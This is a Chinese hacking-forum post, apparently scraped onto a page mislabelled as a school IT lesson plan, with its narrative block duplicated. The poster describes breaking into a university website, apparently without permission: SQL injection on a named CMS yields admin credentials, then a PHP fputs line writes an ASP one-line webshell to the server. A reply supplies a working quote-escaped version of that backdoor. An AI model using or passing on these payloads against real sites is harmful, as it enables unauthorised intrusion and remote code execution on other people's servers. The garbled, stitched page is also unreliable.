初中信息技术获奖教案:PHP fputs ' " 引号问题
来源:百度文库 编辑:查人人中国名人网 时间:2024/10/03 06:02:52
这些天没事,在XX群有个人丢了篇新闻; 而连接出自XX大学;
于是就对其进行安全检测;
翻了几个页面,最终确定整站用的是尘缘雅境图文系统 3.0 , SQL inject 得到后台管理员帐号密码;
在后台找了上传的地方, 上传asp,cer 不允许;
就在网站属性处修改能上传 asp|cer|aaspsp|htr 都没能拿到能正常执行的shell,
(PS:尘缘雅境图文系统 修改了上传类型之后 还是不能上传 asp asa cer等文件`)
最后发现能直接上传php, 可是那服务器没把php配置好,传个phpshell上去就报错, 最后测试能用fputs写文件上去; 再此就遇到了 ' " 引号问题, fputs 遇到多的引号就报错.
<?fputs(fopen("./up.asp","w"),"<%execute request("l")%>")?>
顺便请问下各位牛人, 有没有不用 引号的 一句话 asp 后门~!
于是就对其进行安全检测;
翻了几个页面,最终确定整站用的是尘缘雅境图文系统 3.0 , SQL inject 得到后台管理员帐号密码;
在后台找了上传的地方, 上传asp,cer 不允许;
就在网站属性处修改能上传 asp|cer|aaspsp|htr 都没能拿到能正常执行的shell,
(PS:尘缘雅境图文系统 修改了上传类型之后 还是不能上传 asp asa cer等文件`)
最后发现能直接上传php, 可是那服务器没把php配置好,传个phpshell上去就报错, 最后测试能用fputs写文件上去; 再此就遇到了 ' " 引号问题, fputs 遇到多的引号就报错.
<?fputs(fopen("./up.asp","w"),"<%execute request("l")%>")?>
顺便请问下各位牛人, 有没有不用 引号的 一句话 asp 后门~!
<?fputs(fopen("./up.asp","w"),"<%execute request(\"l\")%>")?>
你php没配置怎么用fopen啊?